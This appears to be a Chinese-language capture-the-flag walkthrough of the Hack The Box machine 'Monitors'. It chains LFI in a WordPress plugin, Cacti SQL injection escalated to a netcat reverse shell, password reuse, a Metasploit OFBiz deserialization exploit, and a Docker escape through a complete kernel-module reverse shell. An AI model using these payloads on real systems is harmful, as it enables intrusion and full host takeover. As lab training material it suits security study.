基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ nmap -sC -sV -Pn 10.10.10.238
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-27 14:51 CST
Nmap scan report for monitors.htb (10.10.10.238)
Host is up (0.068s latency).
Not shown: 997 closed ports
PORT    STATE    SERVICE VERSION
22/tcp  open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 ba:cc:cd:81:fc:91:55:f3:f6:a9:1f:4e:e8:be:e5:2e (RSA)
|   256 69:43:37:6a:18:09:f5:e7:7a:67:b8:18:11:ea:d7:65 (ECDSA)
|_  256 5d:5e:3f:67:ef:7d:76:23:15:11:4b:53:f8:41:3a:94 (ED25519)
80/tcp  open     http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.5.1
|_http-title: Welcome to Monitor – Taking hardware monitoring seriously
981/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.07 seconds

80

直接ip访问是错误页面,加hosts后访问是一个wordpress:

wordpress

wpscan

wordpress那就wpscan,发现一个存在漏洞的插件:

lfi

测试发现只能利用lfi,rfi不解析执行:

log

log里得到另一个域名:

(更新,看ippsec视频是读的apache 配置文件得到vhost,这个log可能是别人访问后的结果)

1
2
3
http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//proc/self/fd/10

http://cacti-admin.monitors.htb

wp-config.php

lfi读wp-config得到密码:

1
2
3
view-source:http://monitors.htb/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//var/www/wordpress/wp-config.php

BestAdministrator@2020!

cacti

cacti的域名加hosts后访问,密码就是wp-config里得到的密码,Version 1.2.12:

sql注入

搜到相关漏洞:

1
http://cacti-admin.monitors.htb/cacti/color.php?action=export&header=false&filter=')union select 1,username,password,4,5,6,7 from user_auth;--+-

rce

同样是根据GitHub那个issue,sqli to rce,第一个请求更改设置,第二个请求触发reverse shell:

1
2
3
http://cacti-admin.monitors.htb/cacti/color.php?action=export&header=false&filter=1%27)+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value=%27rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2%3E%261|nc+10.10.14.4+4444+%3E/tmp/f;%27+where+name=%27path_php_binary%27;--+-

http://cacti-admin.monitors.htb/cacti/host.php?action=reindex&host_id=1

marcus

用户目录只有marcus, 所以查看和他相关的文件内容:

1
2
3
4
5
6
7
8
9
grep 'marcus' /etc -R 2>/dev/null

/etc/group-:marcus:x:1000:
/etc/subgid:marcus:165536:65536
/etc/group:marcus:x:1000:
/etc/passwd:marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash
/etc/systemd/system/cacti-backup.service:ExecStart=/home/marcus/.backup/backup.sh
/etc/subuid:marcus:165536:65536
/etc/passwd-:marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash

发现cacti-backup.service执行backup.sh

backup

查看两个文件,得到密码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
www-data@monitors:/home/marcus$ cat /etc/systemd/system/cacti-backup.service

cat /etc/systemd/system/cacti-backup.service
[Unit]
Description=Cacti Backup Service
After=network.target

[Service]
Type=oneshot
User=www-data
ExecStart=/home/marcus/.backup/backup.sh

[Install]
WantedBy=multi-user.target
www-data@monitors:/home/marcus$
www-data@monitors:/home/marcus$ cat /home/marcus/.backup/backup.sh

cat /home/marcus/.backup/backup.sh
#!/bin/bash

backup_name="cacti_backup"
config_pass="VerticalEdge2020"

zip /tmp/${backup_name}.zip /usr/share/cacti/cacti/*
sshpass -p "${config_pass}" scp /tmp/${backup_name} 192.168.1.14:/opt/backup_collection/${backup_name}.zip
rm /tmp/${backup_name}.zip

user flag

这个密码就是marcus用户密码,ssh登录,得到user.txt:

信息

查看端口发现8443开在本地,转发出来访问:

1
2
3
ssh -L 8443:127.0.0.1:8443 marcus@monitors.htb

VerticalEdge2020

tomcat 9.0.31

CVE-2020-9496

msf有模块一键打:

1
2
3
4
5
6
use linux/http/apache_ofbiz_deserialiation
set payload linux/x64/shell_reverse_tcp
set rhosts 127.0.0.1
set lhost 10.10.x.x
set forceexploit true
run

打到docker root:

docker逃逸

docker容器和宿主机共享内核模块,发现有cap_sys_module:

1
capsh --print

sys_module

1
2
3
4
5
6
7
8
9
10
11
curl http://10.10.14.4/reverse-shell.c -O /tmp/reverse-shell.c
curl http://10.10.14.4/Makefile -O /tmp/Makefile

# 很奇怪的问题,tmp目录make失败,/root目录就正常
make

# 宿主机
nc -lnvp 4443

# 容器
insmod reverse-shell.ko

reverse-shell.c

注意ip是外部宿主机:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/172.17.0.1/4443 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
static int __init reverse_shell_init(void) {
	return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit reverse_shell_exit(void) {
	printk(KERN_INFO "Exiting\n");
}
module_init(reverse_shell_init);
module_exit(reverse_shell_exit);

Makefile

1
2
3
4
5
obj-m +=reverse-shell.o
all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

root flag

加载内核模块后,宿主机得到root shell:

参考资料